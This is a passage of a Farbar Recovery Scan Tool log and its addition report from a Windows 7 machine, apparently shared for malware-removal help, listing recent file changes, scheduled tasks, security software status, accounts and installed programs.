2019-11-16 16:39 - 2019-11-16 16:39 - 000000000 ____D C:\Users\Vladana\AppData\Local\Turbo.net
2019-11-16 16:21 - 2019-11-16 16:21 - 000000000 ____D C:\Users\Vladana\Documents\Visual Studio 2005
2019-11-16 15:55 - 2019-11-16 15:55 - 000001276 _____ C:\Users\Public\Desktop\Freemake Video Converter.lnk
2019-11-16 15:55 - 2019-11-16 15:55 - 000001276 _____ C:\ProgramData\Desktop\Freemake Video Converter.lnk
2019-11-16 15:55 - 2019-11-16 15:55 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Freemake
2019-11-16 15:55 - 2019-11-16 15:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Freemake
2019-11-16 14:14 - 2019-11-16 14:14 - 000001216 _____ C:\Users\Vladana\Desktop\4K Video Downloader.lnk
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\4K Video Downloader
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Users\Vladana\AppData\Local\4kdownload.com
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Program Files (x86)\4KDownload
2019-11-15 19:03 - 2019-11-17 00:15 - 000000000 ____D C:\Users\Vladana\AppData\Local\ZenMate
2019-11-11 01:34 - 2019-11-19 14:45 - 000003348 _____ C:\Windows\system32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-11 01:34 - 2019-11-19 14:45 - 000003218 _____ C:\Windows\system32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-08 21:02 - 2019-11-11 01:28 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2019-10-22 01:05 - 2019-10-22 01:05 - 000000935 _____ C:\Users\Public\Desktop\Mp3tag.lnk
2019-10-22 01:05 - 2019-10-22 01:05 - 000000935 _____ C:\ProgramData\Desktop\Mp3tag.lnk
 
==================== One month (modified) ==================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-11-19 15:28 - 2009-07-14 05:45 - 000016816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-11-19 15:28 - 2009-07-14 05:45 - 000016816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-11-19 15:25 - 2018-07-17 21:31 - 000000000 ____D C:\Users\Vladana\AppData\Local\AVAST Software
2019-11-19 15:22 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-19 14:43 - 2015-04-11 19:53 - 000000000 ____D C:\Windows\pss
2019-11-19 11:10 - 2014-10-19 23:52 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\vlc
2019-11-18 19:45 - 2013-03-19 22:08 - 000746014 _____ C:\Windows\system32\perfh00C.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000740656 _____ C:\Windows\system32\perfh015.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000714178 _____ C:\Windows\system32\prfh0416.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000684052 _____ C:\Windows\system32\perfh00E.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000607286 _____ C:\Windows\system32\perfh008.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000494812 _____ C:\Windows\system32\perfh014.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000479312 _____ C:\Windows\system32\perfh001.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000417076 _____ C:\Windows\system32\perfh011.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000171600 _____ C:\Windows\system32\perfc00E.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000156198 _____ C:\Windows\system32\perfc015.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000149906 _____ C:\Windows\system32\perfc00C.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000147982 _____ C:\Windows\system32\prfc0416.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000122426 _____ C:\Windows\system32\perfc011.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000111454 _____ C:\Windows\system32\perfc008.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000095730 _____ C:\Windows\system32\perfc014.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000095098 _____ C:\Windows\system32\perfc001.dat
2019-11-18 19:45 - 2013-03-19 15:24 - 000481800 _____ C:\Windows\system32\perfh00B.dat
2019-11-18 19:45 - 2013-03-19 15:24 - 000101846 _____ C:\Windows\system32\perfc00B.dat
2019-11-18 19:45 - 2009-07-14 06:13 - 007211860 _____ C:\Windows\system32\PerfStringBackup.INI
2019-11-18 19:45 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2019-11-18 19:28 - 2013-02-21 15:11 - 000000000 ____D C:\Program Files (x86)\Nokia
2019-11-18 13:46 - 2017-09-05 15:33 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Mp3tag
2019-11-17 22:16 - 2013-02-21 01:36 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Azureus
2019-11-17 02:16 - 2013-02-20 22:41 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2019-11-16 17:47 - 2019-05-23 11:52 - 000003160 _____ C:\Windows\system32\Tasks\{EF41326F-22E8-4DCF-A020-C6061802D389}
2019-11-16 17:47 - 2018-09-06 18:23 - 000003334 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2019-11-16 17:47 - 2018-09-06 18:23 - 000003206 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2019-11-16 17:47 - 2018-03-14 03:40 - 000004470 _____ C:\Windows\system32\Tasks\Adobe Flash Player NPAPI Notifier
2019-11-16 17:47 - 2016-03-23 08:37 - 000003052 _____ C:\Windows\system32\Tasks\SafeZone scheduled Autoupdate 1458718670
2019-11-16 17:47 - 2016-01-03 12:45 - 000003652 _____ C:\Windows\system32\Tasks\DivXUpdate
2019-11-16 17:47 - 2015-12-03 22:42 - 000000000 ____D C:\Windows\system32\Tasks\AVAST Software
2019-11-16 17:47 - 2015-06-10 12:59 - 000004458 _____ C:\Windows\system32\Tasks\Adobe Flash Player PPAPI Notifier
2019-11-16 17:47 - 2015-06-10 12:47 - 000003850 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1433936833
2019-11-16 17:47 - 2015-02-06 11:56 - 000003432 _____ C:\Windows\system32\Tasks\RealDownloader Update Check
2019-11-16 17:47 - 2015-01-06 11:27 - 000004476 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2019-11-16 17:47 - 2014-07-14 00:42 - 000003226 _____ C:\Windows\system32\Tasks\{375818AB-9982-4CB0-BF65-E9B77DBF0F5C}
2019-11-16 17:47 - 2013-02-28 00:53 - 000003390 _____ C:\Windows\system32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-16 17:47 - 2013-02-21 21:07 - 000003508 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000UA
2019-11-16 17:47 - 2013-02-21 21:07 - 000003236 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000Core
2019-11-16 17:47 - 2013-02-20 22:41 - 000004312 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2019-11-16 17:46 - 2019-05-23 15:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2019-11-16 16:21 - 2013-02-20 22:23 - 000000000 ____D C:\Users\Vladana\AppData\Local\Microsoft Help
2019-11-16 15:55 - 2014-08-18 11:50 - 000000000 ____D C:\Program Files (x86)\Freemake
2019-11-16 14:54 - 2017-07-25 15:43 - 000000000 ____D C:\Users\Vladana\AppData\Local\FreemakeVideoConverter
2019-11-16 14:54 - 2014-08-18 11:50 - 000000000 ____D C:\ProgramData\Freemake
2019-11-16 13:48 - 2017-08-25 02:23 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ZenGuard GmbH
2019-11-15 19:04 - 2017-08-25 02:23 - 000000000 ____D C:\Users\Vladana\AppData\Local\SquirrelTemp
2019-11-15 17:02 - 2013-02-20 21:51 - 000000000 ____D C:\Users\Vladana\AppData\Local\Google
2019-11-13 21:40 - 2013-02-20 22:41 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2019-11-13 21:40 - 2013-02-20 22:41 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2019-11-13 21:40 - 2013-02-20 22:41 - 000000000 ____D C:\Windows\system32\Macromed
2019-11-11 15:42 - 2016-09-25 12:57 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Apowersoft
2019-11-11 01:33 - 2017-03-14 00:19 - 000004168 _____ C:\Windows\system32\Tasks\Avast Emergency Update
2019-11-11 01:28 - 2013-02-20 21:52 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-11-09 12:32 - 2017-04-16 10:33 - 000000000 ____D C:\Users\Vladana\AppData\LocalLow\Mozilla
2019-11-08 01:14 - 2018-09-06 18:24 - 000002184 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-11-08 01:14 - 2018-09-06 18:24 - 000002143 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-11-08 01:14 - 2018-09-06 18:24 - 000002143 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2019-11-07 18:44 - 2015-06-10 12:47 - 000000000 ____D C:\Program Files (x86)\Opera
2019-11-06 11:30 - 2016-09-05 13:58 - 000001271 _____ C:\Users\Vladana\Desktop\marker.txt
2019-11-05 05:03 - 2013-02-20 21:52 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Mozilla
2019-11-05 00:06 - 2015-10-15 21:00 - 000000000 ____D C:\Program Files (x86)\Google
2019-10-22 01:05 - 2017-09-05 14:37 - 000000000 ____D C:\Program Files (x86)\Mp3tag
 
==================== Files in the root of some directories ========
 
2013-04-12 20:07 - 2014-11-17 02:37 - 000000580 _____ () C:\Users\Vladana\AppData\Roaming\AutoGK.ini
2013-03-15 02:55 - 2014-11-18 03:36 - 000010752 _____ () C:\Users\Vladana\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-05-19 01:43 - 2015-05-19 01:43 - 000247298 _____ () C:\Users\Vladana\AppData\Local\Tempdivx84f8
2015-07-02 22:06 - 2015-07-02 22:06 - 000043682 _____ () C:\Users\Vladana\AppData\Local\Tempdivxffab
 
==================== SigCheck ============================
 
(There is no automatic fix for files that do not pass verification.)
 
 
LastRegBack: 2019-11-19 02:30
==================== End of FRST.txt ========================
 
 
Copy of Addition.txt:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-11-2019
Ran by Vladana (19-11-2019 15:33:16)
Running from C:\Users\Vladana\Desktop
Windows 7 Ultimate (X64) (2013-02-20 19:53:32)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-7682389-3612777877-391866582-500 - Administrator - Disabled)
Guest (S-1-5-21-7682389-3612777877-391866582-501 - Limited - Disabled)
Vladana (S-1-5-21-7682389-3612777877-391866582-1000 - Administrator - Enabled) => C:\Users\Vladana
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avast Antivirus (Disabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Disabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4K Video Downloader (HKLM-x32\...\4K Video Downloader) (Version:  - Open Media LLC)
ACDSee 10 Photo Manager (HKLM-x32\...\{F8B98EB6-FC06-45BF-87D4-9784E0408611}) (Version: 10.0.219 - ACD Systems International)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20063 - Adobe Systems Incorporated)
Adobe Flash Player 32 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 32.0.0.293 - Adobe)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.293 - Adobe)
Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.293 - Adobe)
Adobe Shockwave Player 12.3 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.3.4.204 - Adobe Systems, Inc.)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version:  - ALPS ELECTRIC CO., LTD.)
Apowersoft Online Launcher version 1.6.1 (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\{20BF67A8-D81A-4489-8225-FABAA0896E2D}_is1) (Version: 1.6.1 - APOWERSOFT LIMITED)
Auto Gordian Knot 2.55 (HKLM-x32\...\AutoGK) (Version: 2.55 - len0x)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 19.8.2393 - AVAST Software)
AVI ReComp 1.5.5 (HKLM-x32\...\AVI ReComp) (Version: 1.5.5 - Mateusz Gola (aka Prozac))
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Awesomium.NET Redistribution Module (HKLM-x32\...\{C34CAF35-6198-4EEB-970F-C61FC51D23BD}) (Version: 1.7.4.2 - ©2014 Awesomium Technologies LLC) Hidden
Bigasoft Total Video Converter 3.7.24.4700 (HKLM-x32\...\{a72ce741-1f32-4d79-bffb-a714375c678d}_is1) (Version:  - Bigasoft Corporation)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DivX Setup (HKLM\...\DivX Setup) (Version: 10.8.7.0 - DivX, LLC)
FileLab Plugin 1.1.33 (HKLM-x32\...\{6AC5F630-9453-433D-90FF-BB3A8E4F8960}) (Version: 1.1.33 - FileLab)
FJ Camera (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.52032.0_WHQL - Sonix)
Freemake Video Converter version 4.1.10 (HKLM-x32\...\Freemake Video Converter_is1) (Version: 4.1.10 - Mixbyte Inc.)
Fujitsu Hotkey Utility (HKLM-x32\...\{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED) Hidden
Fujitsu Hotkey Utility (HKLM-x32\...\InstallShield_{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED)
Fujitsu MobilityCenter Extension Utility (HKLM\...\{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 4.01.00.000 - FUJITSU LIMITED) Hidden
Fujitsu MobilityCenter Extension Utility (HKLM-x32\...\InstallShield_{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 4.01.00.000 - FUJITSU LIMITED)
Fujitsu System Extension Utility (HKLM\...\{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED) Hidden
Fujitsu System Extension Utility (HKLM-x32\...\InstallShield_{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 78.0.3904.97 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.341 - Google LLC) Hidden
Google Video Support Plugin (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 19.11.1800.0 - Google, LLC.)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version:  - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2696 - Intel Corporation)
Intel® PROSet/Wireless for Bluetooth® + High Speed (HKLM\...\{705EE775-5776-48FD-B704-C3C9CF535420}) (Version: 15.1.1.0170 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology (HKLM\...\{F0932859-AA60-459E-B843-0BDECA34E2C7}) (Version: 2.0.0.0086 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.0.0.1032 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{BAA0BE9B-9E6D-4802-91CB-FB7ED5CD4BEF}) (Version: 15.01.1500.1034 - Intel Corporation)
iPool (HKLM-x32\...\iPool) (Version: 2.2.03 - Memir Games)
iSnooker 2.2.60 (HKLM-x32\...\isnooker_memir_is1) (Version: 2.2.60 - Memir Games Ltd)
Java 8 Update 221 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180221F0}) (Version: 8.0.2210.11 - Oracle Corporation)
KeepVid Pro(Build 6.3.2.0) (HKLM-x32\...\KeepVid Pro_is1) (Version: 6.3.2.0 - KeepVid Studio)
LIFEBOOK Application Panel (HKLM\...\{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED) Hidden
LIFEBOOK Application Panel (HKLM-x32\...\InstallShield_{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED)
Malwarebytes version 3.4.5.2467 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.4.5.2467 - Malwarebytes)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Save as PDF or XPS Add-in for 2007 Microsoft Office programs (HKLM-x32\...\{90120000-00B2-0409-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\SkyDriveSetup.exe) (Version: 17.0.2006.0314 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{5BABDA39-61CF-41EE-992D-4054B6649A9B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{ED6C77F9-4D7E-447C-9EC0-9A212D075535}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 70.0.1.7242 - Mozilla)
Mp3tag v2.99a (HKLM-x32\...\Mp3tag) (Version: 2.99a - Florian Heidenreich)
MSVC80_x64_v2 (HKLM\...\{4D668D4F-FAA2-4726-834C-31F4614F312E}) (Version: 1.0.3.0 - Nokia) Hidden
MSVC80_x86_v2 (HKLM-x32\...\{6D3245B1-8DB8-4A23-9CD2-2C90F40ABAF6}) (Version: 1.0.3.0 - Nokia) Hidden
MSVC90_x64 (HKLM\...\{AB071C8B-873C-459F-ACA9-9EBE03C3E89B}) (Version: 1.0.1.2 - Nokia) Hidden
MSVC90_x86 (HKLM-x32\...\{AF111648-99A1-453E-81DD-80DBBF6DAD0D}) (Version: 1.0.1.2 - Nokia) Hidden
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Noise Reduction Plug-In 2.0 (HKLM-x32\...\{B94515E1-2DD6-11E2-849E-F04DA23A5C58}) (Version: 2.0.515 - Sony)
Nokia Connectivity Cable Driver (HKLM-x32\...\{29373274-977E-413C-A4DE-DC0F8E80C429}) (Version: 7.1.172.0 - Nokia)
Nokia Software Updater (HKLM-x32\...\{7130468A-F53F-4698-8C09-A339EA3B05E6}) (Version: 3.0.655 - Nokia)
Nokia Suite (HKLM-x32\...\{88B6F9DE-C80F-4A70-ACF6-BEE933679170}) (Version: 3.8.54.0 - Nokia) Hidden
Nokia Suite (HKLM-x32\...\Nokia Suite) (Version: 3.8.54.0 - Nokia)
Opera Stable 64.0.3417.92 (HKLM-x32\...\Opera 64.0.3417.92) (Version: 64.0.3417.92 - Opera Software)
PC Connectivity Solution (HKLM-x32\...\{6D01D1B1-17BD-4F10-BB11-F08F0C47D42B}) (Version: 12.0.109.0 - Nokia)
PeaZip 5.2.0 (HKLM-x32\...\{5A2BC38A-406C-4A5B-BF45-6991F9A05325}_is1) (Version:  - Giorgio Tani)
Plugfree NETWORK (HKLM\...\{7BA64D21-EE46-4a9a-8145-52B0175C3F86}) (Version: 6.2.0.1 - FUJITSU LIMITED)
Plugfree NETWORK (HKLM\...\{E1C056BE-ACC9-4FCF-B37D-55A46648B369}) (Version: 6.2.001 - FUJITSU LIMITED) Hidden
Power Saving Utility (HKLM-x32\...\{49A588CF-5FD4-4774-BFBF-0764287DE82B}) (Version: 32.01.10.043 - FUJITSU LIMITED)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RealDownloader (HKLM-x32\...\{6FCD4D5A-20B9-4D79-ABA5-4E7048944025}) (Version: 17.0.15.4 - RealNetworks, Inc.) Hidden
RealDownloader (HKLM-x32\...\{e6171278-8759-449d-9e0b-c1825debc2ad}) (Version: 17.0.15.7 - RealNetworks) Hidden
RealDownloader (HKLM-x32\...\{FBEFDC9E-F8FB-4B66-A78B-09B7B380D59D}) (Version: 17.0.15.7 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (HKLM-x32\...\{7770E71B-2D43-4800-9CB3-5B6CAAEBEBEA}) (Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (HKLM\...\{21E47F47-C9A7-4454-BA48-388327B0EA00}) (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (HKLM-x32\...\{AAECF7BA-E83B-4A10-87EA-DE0B333F8734}) (Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer Cloud (HKLM-x32\...\RealPlayer 17.0) (Version: 17.0.15 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.53.216.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6526 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30129 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (HKLM-x32\...\{28C2DED6-325B-4CC7-983A-1777C8F7FBAB}) (Version: 1.1.0 - RealNetworks, Inc.) Hidden
SafeZone Stable 1.48.2066.44 (HKLM-x32\...\SafeZone 1.48.2066.44) (Version: 1.48.2066.44 - Avast Software) Hidden
SolveigMM AVI Trimmer (HKLM-x32\...\SolveigMM AVI Trimmer 2.0.1210.11) (Version: 2.0.1210.11 - Solveig Multimedia)
Sound Forge Pro 10.0 (HKLM-x32\...\{8EF5E2B0-2DD1-11E2-89A5-F04DA23A5C58}) (Version: 10.0.507 - Sony)
Spotify (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Spotify) (Version: 1.1.8.439.g8502297d - Spotify AB)
Subtitle Edit 3.4.3 (HKLM-x32\...\SubtitleEdit_is1) (Version: 3.4.3.0 - Nikse)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Total Commander (Remove or Repair) (HKLM-x32\...\Totalcmd) (Version:  - )
Unity Web Player (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
UpdateService (HKLM-x32\...\{E3AE96D6-E196-45B4-AF62-2B41998B9E37}) (Version: 1.0.0 - RealNetworks, Inc.) Hidden
VC80CRTRedist - 8.0.50727.6195 (HKLM-x32\...\{933B4015-4618-4716-A828-5289FC03165F}) (Version: 1.2.0 - DivX, Inc) Hidden
VCRedistSetup (HKLM-x32\...\{3921A67A-5AB1-4E48-9444-C71814CF3027}) (Version: 1.0.0 - Nero AG) Hidden
Video Download Capture version 6.2.8 (HKLM-x32\...\{b3336f66-e079-4ff6-abdb-51e2fab781d5}_is1) (Version: 6.2.8 - APOWERSOFT LIMITED)
Video Downloader (HKLM-x32\...\{62796191-6F12-4ABE-BA8B-B4D4A266C997}) (Version: 1.0.0 - RealNetworks) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
VobSub v2.23 (Remove Only) (HKLM-x32\...\VobSub) (Version:  - )
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 5.7.6.0 - Azureus Software, Inc.)
Winamp (HKLM-x32\...\Winamp) (Version: 5.623  - Nullsoft, Inc)
Winamp Detector Plug-in (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
Windows Driver Package - Nokia pccsmcfd LegacyDriver  (05/31/2012 7.1.2.0) (HKLM\...\62BBD193ADFDBB228C7E1ADB56463F5732FF7F6F) (Version: 05/31/2012 7.1.2.0 - Nokia)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Wondershare Filmora(Build 8.5.3) (HKLM\...\Wondershare Filmora_is1) (Version:  - Wondershare Software)
Wondershare Helper Compact 2.5.2 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.5.2 - Wondershare)
XviD MPEG4 Video Codec (remove only) (HKLM-x32\...\XviD MPEG4 Video Codec) (Version:  - )
ZD Soft Screen Recorder 11.2.0 (HKLM-x32\...\{05289906-8CDE-44FD-9FA5-95866BF511A9}) (Version: 11.2.0.0 - ZD Soft)
